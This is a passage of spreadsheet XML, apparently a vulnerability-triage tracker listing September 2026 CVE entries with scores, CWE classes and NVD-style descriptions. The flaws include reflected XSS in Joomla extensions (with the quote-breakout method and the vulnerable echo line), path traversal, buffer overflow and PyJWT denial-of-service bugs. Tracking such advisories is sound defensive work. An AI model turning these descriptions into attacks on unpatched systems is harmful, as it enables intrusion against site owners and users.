      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100753</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="inlineStr"/>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S241" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Reflected Cross-Site Scripting in Real Estate Manager (Free) &lt; 6.7.9 -  The public property-detail page’s “leave a review” form repopulates its title field directly from the request with no escaping and no filtering function of any kind, unlike the adjacent comment field on the same form, which at least receives partial tag-stripping. A " character in the title query parameter breaks out of the HTML attribute the value is placed in, allowing a following &lt;script&gt; element to execute in the browser of anyone who loads the crafted link.</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100753</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101003</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr">
        <is>
          <t>f5, go</t>
        </is>
      </c>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S242" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Cesanta Mongoose up to 7.21. Affected by this vulnerability is the function fn of the file tutorials/mqtt/mqtt-server/main.c of the component MQTT Broker. Executing a manipulation can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. Upgrading to version 7.22 addresses this issue. This patch is called a9df523f76f43a38bd53b4232b9cfd4c16869e71. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101003</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101054</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="S243" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Thinkware U3000 up to 1.02.04. Affected is the function get_file of the file /tmp/wpa_supplicant.conf of the component TCP Service. The manipulation leads to improper access controls. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101054</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101070</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S244" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in dbgate up to 7.3.1. Affected by this vulnerability is the function files of the file packages/api/src/controllers/runners.js of the component Files Endpoint. The manipulation of the argument runid leads to path traversal. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101070</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101082</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="inlineStr"/>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S245" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in PMWeb 7.x/8.x/2025.x. This issue affects some unknown processing of the file downloader.aspx. This manipulation of the argument FullFileName/FileName causes path traversal. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101082</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101092</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="inlineStr"/>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S246" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.4 fails to enforce publish-access checks in the getCurrentAttrViewImages endpoint, allowing publish readers to retrieve image asset paths from unauthorized databases. Attackers can call the endpoint with an unrendered database identifier obtained through related endpoints to leak detached-row image asset paths and filenames that the rendering endpoint would deny.</t>
        </is>
      </c>
      <c r="T246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101092</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101098</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-404</t>
        </is>
      </c>
      <c r="S247" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in ag-ui-protocol ag-ui up to 2026-09-23. Affected by this issue is the function readAllBytes of the file JdkAgentHttpHandler.java of the component HTTP Handler. Such manipulation leads to resource consumption. The attack can be launched remotely. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="T247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101098</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101101</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S248" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in ag-ui-protocol ag-ui up to 2026-09-07. This issue affects the function JSON.parse of the file legacy/convert.ts of the component Middleware. The manipulation leads to uncaught exception. Remote exploitation of the attack is possible. Upgrading to version 2026-09-08 is capable of addressing this issue. The identifier of the patch is 30f8c794d5b73df5c610153043db502b2cc106cc. Upgrading the affected component is recommended.</t>
        </is>
      </c>
      <c r="T248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101101</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101109</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S249" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Reflected Cross-Site Scripting in Vehicle Manager (Free) &lt; 6.5.8 - The public vehicle-detail page (task=view) echoes the title request parameter directly into a double-quoted HTML attribute with no output encoding of any kind. A double-quote character in the parameter closes the attribute, allowing arbitrary markup, including a &lt;script&gt; tag, to be injected into the page.</t>
        </is>
      </c>
      <c r="T249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101109</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101111</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S250" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Reflected Cross-Site Scripting in Book Library (Free) &lt; 6.4.6 - The public book-detail page template, site/views/view_book/tmpl/default.php, echoes the raw title request parameter directly into a double-quoted HTML attribute with no escaping function of any kind (echo $_REQUEST["title"];). A value containing a double quote closes the attribute early and allows arbitrary HTML/JavaScript to follow.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101111</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101917</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr">
        <is>
          <t>python, requests</t>
        </is>
      </c>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S251" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT get_signing_key_from_jwt is affected because unknown kid misses force refreshes without a negative cache or minimum refresh interval. This occurs when unauthenticated tokens repeatedly use the same unknown kid or varying kid values absent from the cached JWKS. As a result, each cache miss causes PyJWKClient to refresh the JWKS. Consequently, attacker traffic can amplify outbound requests to the configured JWKS endpoint. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101917</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101918</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S252" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.0.0a1 until 2.15.0, PyJWT PyJWKClient.get_signing_key_from_jwt is affected because payload parser catches ValueError but not RecursionError. This occurs when an attacker-controlled recursively nested payload reaches json.loads. As a result, documented PyJWT exception handling does not contain the failure. Consequently, an unauthenticated request can raise an exception that may produce an HTTP 500 response. The advisory-defined affected implementation also includes jwt/api_jwt.py, verify_signature=False. This issue is fixed in version 2.15.0.</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101918</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102265</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="inlineStr"/>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S253" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, PyJWS._load in jwt/api_jws.py is affected because parser catches ValueError but not RecursionError. This occurs when a deeply nested token header reaches json.loads. As a result, RecursionError escapes the documented PyJWT error hierarchy. Consequently, an unauthenticated malformed token can cause a request-level failure and HTTP 500. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102265</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102277</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="inlineStr"/>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr">
        <is>
          <t>node.js, rust</t>
        </is>
      </c>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S254" s="5" t="inlineStr">
        <is>
          <t>The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to 1.1.21, 2.1.7, 3.0.9, and 5.0.12, the expand function handles untrusted {a},b}-shaped patterns with many trailing closing braces by restarting its scan once for each trailing closing brace. The successive full-input rescans with linear working-string growth cause quadratic CPU time and memory pressure that can block the Node.js event loop. The process eventually recovers, making the impact a recoverable CPU denial of service. This issue is fixed in versions 1.1.21, 2.1.7, 3.0.9, and 5.0.12.</t>
        </is>
      </c>
      <c r="T254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102277</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102362</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S255" s="5" t="inlineStr">
        <is>
          <t>mall4j through 4.0 fails to implement authentication controls on the DELETE /prodComm endpoint in ProdCommController. Unauthenticated attackers can delete arbitrary product reviews by supplying the prodCommId parameter without authorization checks.</t>
        </is>
      </c>
      <c r="T255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102362</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18825</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>64c5ae8f-7972-4697-86a0-7ada793ac795</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr"/>
